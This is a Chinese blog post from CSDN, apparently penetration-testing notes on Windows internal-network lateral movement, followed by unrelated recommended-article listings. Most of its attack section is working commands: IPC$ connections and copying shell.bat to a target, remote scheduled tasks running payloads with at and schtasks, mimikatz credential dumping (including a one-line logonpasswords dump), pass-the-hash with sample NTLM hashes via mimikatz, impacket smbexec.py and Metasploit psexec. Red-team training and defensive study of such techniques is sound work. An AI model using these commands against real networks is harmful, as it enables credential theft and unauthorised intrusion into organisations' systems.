内网横向1

最新推荐文章于 2024-05-29 13:49:36 发布
最新推荐文章于 2024-05-29 13:49:36 发布
阅读量1.9k 收藏 38
点赞数 36
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49714982/article/details/136841573
版权

IPC$详解

IPC( Internet Process Connection) 共享 命名管道 的资源 , 是为了实现进程间通信而开放的命名管道。 IPC 可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用
通过 ipc$ ,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件 , 进行上传、下载 操作 还可以在日标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息
其默认使用端口为139、445

利用条件:

1.开启139、445端口.

2.管理员开启默认共享,可以用net share 查看

详细命令:

建立ipc连接:net use \\10.1.1.135\$ipc
删除ipc连接:net use \\10.1.1.135\$ipc /del
遍历c盘下windows目录:  dir \\10.1.1.135\c$\Windows   或者:dir \\10.1.1.135\admin$
复制本地文件到目标机器下users目录:  copy shell.bat \\10.1.1.135\c$\Users 
查看任务:tasklist /S \\10.1.1.135



windows2008及以下: 
添加一项ID为777的任务在4:13执行:
at \\10.1.1.132: 4:13 c:\artifact.exe added a new job with jobid=777   
查看计划任务列表:
at \\10.1.1.132
删除 id 为 777 的计划任务,不加 id 删除所有计划任务:
at \\10.1.1.132 777 /delete


windows2008以上:
添加一项ID为test的任务在4:13执行:
schtasks /create /s 10.1.1.135 /tn test /sc once /st 04:13 /ru system /tr
"cmd.exe /c ipconfig > c:\1.txt" /f /u
立即执行该任务:
schtasks /run /s 10.1.1.135 /i /tn test
删除该任务:
schtasks /s 10.1.1.135 /delete /tn test /f

没有命令回显:

计划运行后
type \\10.1.1.135\c$\1.txt

Windows认证

windows本地认证:

路径: %SystemRoot%\system32\config\sam   (c:\\windows\system32\config\sam)
当我们登录系统的时候 , 系统会自动地读取 SAM 文件中的 密码 与我们输入的 密码 进行比对,如果相 同,证明认证成功! 这个SAM 文件中保留了计算机本地所有用户的凭证信息,可以理解为是一个数据库。

NTLM Hash

NTLM HASH 是支持 Net NTLM 认证协议以及本地认证过程中的一个重要参与物,其长度为 32 位,
由数字和字母组成
Windows 本身不存储用户的明文密码,他会将用户的明文密码经过加密算法后存储在 SAM 数据库
当用户登录时,将用户输入的明文密码也加密成 NTLM HASH ,与 SAM 数据库中的 NTLM HASH
行对比, NTLM HASH 的前身是 LM HASH ,目前已经基本被淘汰(因为算法比较脆弱,但是目前老
版本操作系统还是存在,比如 XP Server 03 )。
这个 NTLM 是一种网络认证协议,与 NTLM Hash 的关系就是: NTLM 网络认证协议是以 NTLM Hash
作为根本凭证进行认证的协议。也就是说, NTLM NTLM Hash 相互对应。

LM Hash(已废弃)

NTLM 协议问世之前,它的前身就是 LM LAN Manager )协议。
LM NTLM 协议的认证机制相同,但是加密算法不同。
目前大多数的 Windows 都采用 NTLM 协议认证, LM 协议已经基本淘汰了,服务器版从 Wndows
Sever2003 以后, Windows 操作系统的认证方式均为 NTLM Hash

Windows网络认证

NTLM协议

NTLM 是一种网络认证协议,它是基于挑战( Chalenge / 响应( Response )认证机制的一种认证模 式。这个协议只支持Windows 早期 SMB 协议在网络上传输明文口令。后来出现 LAN Manager
Challenge/Response 验证机制,简称 LM ,它是如此简单以至很容易就被破解,现在又有了 NTLM 以及 Kerberos。

NTLM V2协议

NTLM v1 NTLM v2 最显著的区别就是 Challenge 与加密算法不同,共同点就是加密的原料都是 NTLM Hash。
不同之处 :
Challage:NTLM v1 Challenge 8 位, NTLM v2 Challenge 16 位。
Net-NTLM Hash:NTLM v1 的主要加密算法是 DES NTLM v2 的主要加密算法是 HMAC-MD5

Pass The Hash (哈希传递)

哈希传递是能够在不需要账户明文密码的情况下完成认证的一个技术。解决了我们渗透中获取不到明文密码、破解不了NTLM Hash而又 想扩大战果的问题

进行哈希传递的必要条件:

1.哈希传递需要被认证的主机能够访问到服务器

2.哈希传递需要被传递认证的用户名

3.哈希传递需要被传递认证用户的 NTLM Hash

常用工具

mimikatz(windows->windows)

cls-----------------------------清屏
exit----------------------------退出
version------------查看mimikatz的版本
system::user-----查看当前登录的系统用户
system::computer-------查看计算机名称
process::list------------------列出进程
process::suspend 进程名称 -----暂停进程
process::stop 进程名称---------结束进程
process::modules --列出系统的核心模块及所在位置
service::list---------------列出系统的服务
service::remove-----------移除系统的服务
service::start stop 服务名称--启动或停止服务
privilege::list---------------列出权限列表
privilege::enable--------激活一个或多个权限
privilege::debug-----------------提升权限
nogpo::cmd------------打开系统的cmd.exe
nogpo::regedit -----------打开系统的注册表
nogpo::taskmgr-------------打开任务管理器
ts::sessions-----------------显示当前的会话
ts::processes------显示进程和对应的pid情况等
sekurlsa::wdigest-----获取本地用户信息及密码
sekurlsa::tspkg------获取tspkg用户信息及密码
sekurlsa::logonPasswords--获登陆用户信息及密码
kerberos::purge # 清除票据
kerberos::list # 查看票据
kerberos::ptc # 导入票据
kerberos::clist # 导入.bin文件
lsadump::lsa /patch   #在DC上查询所有域用户的密码


mimikatz.exe privilege::debug sekurlsa::logonpasswords > 1.txt exit  -------一句话抓密码

常规流程:

mimikatz # a:: // 查看模块 以管理员或其他高权限启动 mimikatz
mimikatz # privilege::debug // 提升至 system 权限 显示 Privilege '20' OK 表示提权成功
mimikatz # sekurlsa:: // 查看指定模块下命令
mimikatz # sekurlsa::logonPasswords // 抓取密码及 hash
哈希传递:
hash 传递成功后 mimikatz 会帮你打开一个目标机 system 权限的 cmd 窗口 
mimikatz # privilege::debug
mimikatz # sekurlsa::pth /user:administrator /domain:WIN-1NUOMDF66RK
/ntlm:afffeba176210fad4628f0524bfe1942
安装 KB2871997 补丁主机 AES256 密钥哈希传递 
mimikatz # privilege::debug
mimikatz # sekurlsa::ekeys
mimikatz # sekurlsa::pth /user:administrator /domain:WIN-1NUOMDF66RK /aes256:抓到
的aes256值

impacket - smbexec.py(linux->windows)

smbexec.py 
# 明文密码传递
smbexec.py administrator:123.com\@192.168.23.144
# NTLM hash 传递
smbexec.py administrator@192.168.23.144 -hashes
:afffeba176210fad4628f0524bfe1942
smbexec.py PEIXUN/Administrator@192.168.23.100 -hashes
:afffeba176210fad4628f0524bfe1942

msf-psexec

msfconsole
use /exploit/windows/smb/psexec
show options

可以看到已经默认设置完了,但是需要额外设置smbuser、smbpass、rhost

set rhost 10.1.1.128   #目标地址
set SMBUser Administrator  #目标地址username
set smbpass bc527e95ccf12e45f4e80923367f85d:2f60d4a58005210ac1580a9aaa7d7e95    #通过mimikatz抓取到的目标地址的LM和NTLM

login_upset
关注
  • 36
    点赞
  • 38
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
企业内网横向渗透检测和拦截实践.pdf
09-11
企业内网横向渗透检测和拦截实践 安全众测 网络安全 法律法规 渗透测试 移动安全
第70天:内网安全-域横向内网漫游Socks代理隧道技术1
08-03
1.内外网简单知识 2.内网 1 和内网 2 通信问题 3.正向反向协议通信连接问题 4.内网穿透代理隧道技术说明 2.测试:内网 1 执行后门-免费主机处理-
内网横向移动密码凭证获取总结.pdf
12-08
转载公众号作为留存记录
032-内网横向移动学习备忘录1
08-04
1 . 1 扩 展 图 1 . 2 络 环 境 1 . 3 简 述 2 . 1 利 条 件 2 . 2 利 式 2 . 3 I P C 相 关 的 命 令 3
内网横向方法总结
不曾扬帆,何以至远方
06-23 2206
内网横向渗透方法总结
内网横向移动
愿路途漫长,莫失莫忘。 愿不骄不躁,安稳顺心。
09-20 37
2.SPN服务-探针,请求,导出,破解,重写。1.mimikatz域横向移动RDP传递。
内网横向移动小结
qq_61475980的博客
03-19 1713
Windows-Mimikatz 适用环境:微软为了防止明文密码泄露发布了补丁 KB2871997,关闭了 Wdigest 功能。当系统为 win10 或 2012R2 以上时,默认在内存缓存中禁止保存明文密码,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。1、在线读2、离线读(解决Mimikatz被拦截)Procdump是微软官方的工具,可在命令行将lsass导出且杀软不会拦截下载之后3、解决高版本读取问题。
内网横向常用手法
weixin_56606020的博客
08-24 1860
内网横向手法
内网横向渗透
weixin_58782362的博客
09-28 460
因为在目标主机上面上传套件在实战中不实用,可能照成数据包丢失,也可能被查杀,也有可能目标主机没有相对的语言解析,所以最好的办法就是直接使用代理。建立ipc链接到目标主机--拷贝要执行的命令脚本到目标主机--查看目标时间、创建计划任务定时执行拷贝到的脚本--删除ipc链接。外部:(交互式,外人开发工具),本地使用./administartor,域主机使用god/administartor。下载对应release,建立socks连接,设置socks代理,配置规则,调用!内部:(交互式windows官方工具)
绕过限制对某内网进行横向移动.pdf
11-25
内网渗透
华纳云:在一个服务器上如何设置多个IP地址?
YOKEhn的博客
05-27 364
在Windows上,可以通过网络连接的高级TCP/IP设置或使用netsh命令添加多个IP地址。在一个服务器上设置多个IP地址的具体步骤取决于所使用的操作系统(例如Linux或Windows)。你也可以使用ip命令临时配置多个IP地址,这在需要立即生效但不重启网络服务的情况下非常有用。在“IP 设置”标签下,点击“添加”按钮,输入新的IP地址和子网掩码,然后点击“添加”。选择“Internet 协议版本 4 (TCP/IPv4)”,然后点击“属性”。右键点击要配置的网络适配器,选择“属性”。
webserver服务器从零搭建到上线(八)|EpollPoller事件分发器类
糖炒栗子
05-28 886
EPollPoller 类实现了基于 epoll 的 I/O 多路复用,通过监控多个文件描述符上的事件,并在事件发生时通知相应的 Channel 对象来处理事件。通过实现这些函数,EPollPoller 能够高效地管理和分发事件。下一节,我们将讲解EventLoop类的具体实现!
TPM之VMK密封
柳似烟的专栏
05-27 410
同样的,具备TPM芯片的电脑,在系统中存在一个\Device\TPM的设备以及对应的TPM驱动程序,所以,当对系统进行基于TPM芯片的Bitlocker加密时,存在DeviceIOControl的交互,下面通过抓包来窥探这一过程。同样,基于TPM的安全启动链也不做过多解释,简单说就是当电脑通过TPM进行全盘加密后,后期对电脑的改动影响系统启动,PCR校验不通过时,触发输入恢复密钥的“蓝屏”。通过分析保存的json格式的文件,追踪文件句柄,得到TPM加密时的所有与驱动层的交互数据。PCR校验位图解释如下。
Linux chmod 命令
最新发布
2301_78660211的博客
05-29 693
chmod命令是 Linux 系统中非常重要的命令,它可以用于修改文件和目录的访问权限,以及控制用户对系统资源的访问。在这篇博客中,我们深入探讨了chmod命令的使用方法,以及如何使用它来管理文件和目录的访问权限。希望这篇博客能够帮助读者更好地理解和使用 Linux 系统。
Linux系统下安装配置nginx,本地访问服务器nginx
y662225dd的博客
05-29 454
3.本地测试服务器上的nginx,出现以下画面即可表示安装nginx成功了,本地连接也没问题。5.安装成功后,nginx会默认安装在/usr/local/nginx目录下。4.编译安装Nginx。1.进入到nginx目录下的sbin。http://服务器ip:8080。
【技术实操】银河高级服务器操作系统实例分享,达梦数据库服务器 oom 问题分析
银河麒麟操作系统的博客
05-28 618
【技术实操】银河高级服务器操作系统实例分享,达梦数据库服务器 oom 问题分析。
服务器数据恢复—异常断电导致ESXi虚拟机无法启动的数据恢复案例
beiya123的博客
05-29 633
服务器数据恢复环境: 某大厂PS4000服务器服务器上部署VMware ESXi虚拟化平台。 服务器故障: 机房断电,重启后服务器中的某台虚拟机不能正常启动。管理员查看虚拟机配置文件,发现无法启动的虚拟机的配置文件除了磁盘文件以外其他配置文件全部丢失,xxx-flat.vmdk磁盘文件和xxx-000001-delta.vmdk快照文件还存在。联系VMware原厂工程师进行诊断,VMware原厂工程师尝试新建一个虚拟机,但发现存储空间不足,于是将故障虚拟机下的xxx-flat.vmdk磁盘文件删除了。
恒创科技:Linux 服务器和 Windows 服务器哪个更好?
SonderCloud_的博客
05-27 782
选择正确的服务器系统至关重要,目前广泛使用的选项是 Windows 服务器 和 Linux 服务器,它们各有优缺点。本文将比较 Linux 与 Windows 服务器,让我们来看看它们的主要区别,然后再决定哪种操作系统适合使用。
ddnsto 内网穿透n1教程
09-05
- *1* *2* *3* [利用软路由插件-DDNSTO,实现内网穿透(ddnsto教程)](https://blog.csdn.net/chenwenjie27/article/details/108934267)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值